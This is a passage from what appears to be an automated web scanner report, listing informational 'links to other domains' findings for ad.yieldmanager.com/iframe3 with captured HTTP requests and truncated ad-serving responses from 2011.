Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:44 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0204.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:44 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601303_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlJtFmK7CLWOWSNrMN2rDeiJlapGhcdik-.MIsvsMPhnP8.fOdHjudAKbLSzYmUcFcS10MOLp4wJZAIG3qeh11CEaYUU3uIfMECBCN2eCnIif1VsA.eVmVmQNlJre6dMjAFALhK82k9fXM
...[SNIP]...
V7TcSdJ5f2q-WIb4.s2barcewth1k4NC3AqDMhZ6B62c2gUK05ZqUGfWWgUMtSy6GynMCFFiaL6mQtjCM7uDe-yI2uu0HqMdVZJ1Sbdj9tLnVaSS0N0KjCEL.Fx3Ry,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601303_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601303_HERE" border="0" alt="">
</a>
...[SNIP]...

19.28. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABosjPWsOXRCmiu9KUhHh5KA4YFjhmN6cF0gdqbAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3150971163%26r%3D0%26s%3D2126909,53ae006e-ed56-11e0-923c-079feb299fc6,1317601584799 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0057.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:25 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601584_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTF1rgzAU.TW-SYjxs8geYjNBVt0KbcW-SEzSWafGRYfir1-YpX9gl8s9H5x7LDusXE6Rw4IAcUirAIaWjZiPGKXUN2EYhgj6CLq2hXxzTCKOiQUTvH9l3hH.DdmRt43pSwJ8lJv6CDCYCQCOVOm8Wd9pAJ.
...[SNIP]...
.5tS2axNXYZI8e.f9imvU0DYaNDRTr5WBSlIsFyEH0C2Cy0ya9KTDUOhQrcVNirA2bONBA3ip7cedaeS7cac0qze.9KNRUKtpz2ZX9T1cJVdZCCR1oJdOJX6N9dAc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601584_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601584_HERE" border="0" alt="">
</a>
...[SNIP]...

19.29. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbySfKQOPRCuBtW9eAxjfSuncSlpuoh7Cd0y0tAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3058821903%26r%3D0%26s%3D2126909,df6669f4-ed54-11e0-b136-78e7d16291d8,1317600960218 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:29 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0305.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:29 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600960_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9KUFlgI8aJsxRC3i5jGDd4QKEX2B7oWzOI-vY0YXsDJZOY7kzPHwVHgCbf12jDcQIw8WEcORmKDcNDWyIZRFBnEeOMhCO0xjRtCHZiS7aPwc.JbNKTPC5lJA5KrRb0EBNwoAK7S7LacPlk
...[SNIP]...
sz48V3xpNztj6SB9vupulqYWKhxHQDJl01cgbqKocZCNWbY9VqcO2MKdGy1XLsLExdaCH.rgZ5bIzyPRgaLWrDx2GUeip1NTSqL4evvpa67KSWxnBRwjh-AAC5cpo=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600960_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600960_HERE" border="0" alt="">
</a>
...[SNIP]...

19.30. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4jrx9Nd7RCrhB5Zrbr2L6GIntVCa9kyBZ.WWIAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3447929958%26r%3D0%26s%3D2126909,de3027bc-ed51-11e0-9772-78e7d1fa0588,1317599669694 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0147.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:13 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599669_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljN9OgzAUxp-GO9K05X-IF8WKQda5GXRxNwTaTuaAbh26jae3EcMLeHJyzu87-c6HnDiEkkeBA6MoCmokRIwczAMEUSQcG8ZxjH2MPQ8HMLTPWSIIRTAjSZ6f1uS3aETzicykIVm.T2oVEnChALhKs8t0OrE
...[SNIP]...
uCu9tCHNhm2zD66j7Pj-TOtpthOFoOsXBqWoBBV0JegTrK.gq46syx2mlwbIwp1XKn5bmxHOpCC.uj6uVeGOV7CBnNa8P7.iz1UOqqF6or-6-ulrpspJbG0CpuHD9w23MV,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599669_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599669_HERE" border="0" alt=""></a>
...[SNIP]...

19.31. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD.5pV5KN.RCqveLM1jpvVjw4XAG1Qbq6rZDktHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3020283874%26r%3D0%26s%3D2126909,6ee5d252-ed52-11e0-acd3-3c4a92f2cdf2,1317599912477 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:57 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0258.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:58:57 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599912_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTMtugzAQ.BpuyPIDAhbqAeqmtRKj0tJU5IIIOCUPMDFUSfj6WCXKD3R3tTszmh1Egg2l1ENVCRGGxKEwQASXHiK-aRsGQUAI9aiHXcezex5VIUOQh9FicUrCv2KULSZkNvPDJJvYux-CMwPAUVqcJ-kkfPi
...[SNIP]...
-uaLJrhj8acc8x.0-2XQ9DZ5HQwnMzFRh0UckLUJ1sL6BUjRGLrQZdbUxzLbda9rVFmAMtPBtVK3eVYTMXIcPLjcG7tpd6yHXRVqrJ299mI3VeSy2N4ahK47gBu7JyvQ==,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599912_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599912_HERE" border="0" alt=""></a>
...[SNIP]...

19.32. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC.Mym1ieXRCn61.ExypkcGjPL1Z3BibicXE1bNAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1515508248%26r%3D0%26s%3D2126909,3c054a08-ed56-11e0-9921-78e7d1614f42,1317601545106 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0163.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601545_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1ugzAMhZ-GOxQl.CO0i9CMCa3pVinbxG4QJG7paEkXmIr69ItG1ReYZdnfsY4P8TOFJUkAwE-bOG0JZMT3ZOxJLOPQxVmWkcgLUy8hke-OZa4oI7ikq0cZbelfsZQ9L2QnS-hWL-o1oejCEAq04Zfl9M0
...[SNIP]...
TPRTVvnirMbzn2.8F1u2k6Oz51vMK2QpNpFMxIn2GYkdQne2x2Bp07ayoM7AyMneOzADtedNUDHJRVUYhTq2Vr-TCMYKbaNIPSp3r4ObVg6g4MWMNRS-v4BVk8c5s=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601545_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601545_HERE" border="0" alt="">
</a>
...[SNIP]...

19.33. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB7T3u9D-fRCuVYsJLcmii2o8-2nEmtcR5AVBdkAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D222434046%26r%3D0%26s%3D2126909,24816474-ed57-11e0-9072-8bf8886ba59e,1317601935151 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0104.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:32:15 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601935_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJSEcFO0h9AMCQ3aVWKrxguiIRS2QlhgKuvXLxtVf2CWZZ9jHR.LyKECu00jXVwRSEjohRQ5WPgOhsgPbUgp9REmAcE-sackqhlHMGGbg.D27C94yJ9WZCoP2D5Z2XPAwIUDQJTOLuvoMwv
...[SNIP]...
ey40X3lr-4xe0ls.9g2-08j5bDLBybrMGsq1ouQI1yWIBQvRlWjQZja0Sxlo2WU2s5nEALe1c1yK42zHPRLxdHg7thknoudTXUqi-Hr.4oddlKLY3grIRR.AANinGt,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601935_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601935_HERE" border="0" alt="">
</a>
...[SNIP]...

19.34. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1u5EQ2uTRCu0UK0wRgb-CaV4hxgLNJw6Nl0NcAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3531193473%26r%3D0%26s%3D2126909,d3a1a59c-ed55-11e0-80e9-78e7d1fa054a,1317601369970 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0398.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:50 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601369_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT2FrgzAQ.TV-k5CYaFNkH2KDRdaUFexK-0U0ibOrNS51VPz1y2bpH9hx3L13vHvHIRzTSpFSlQjjqtKkDmOEA7kIlhGk2odxHBNIcUDCBYr8W5YoxhHM2Oogox37C77krzNylVO2y2b2Rhm4cwCIseI-j74
...[SNIP]...
GHUyP4Hh4fL7n9F99vhqH3MPOC1KUCgy2VHoHpdTcCaa5uWNYW9I0TpVbXVt8aD3MCvSCaTKfPyrEoRL9cVg6fu5u2Q2HLTplr0X1fK22LRlvtBK2RTvEDRHdzgA==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601369_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601369_HERE" border="0" alt="">
</a>
...[SNIP]...

19.35. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

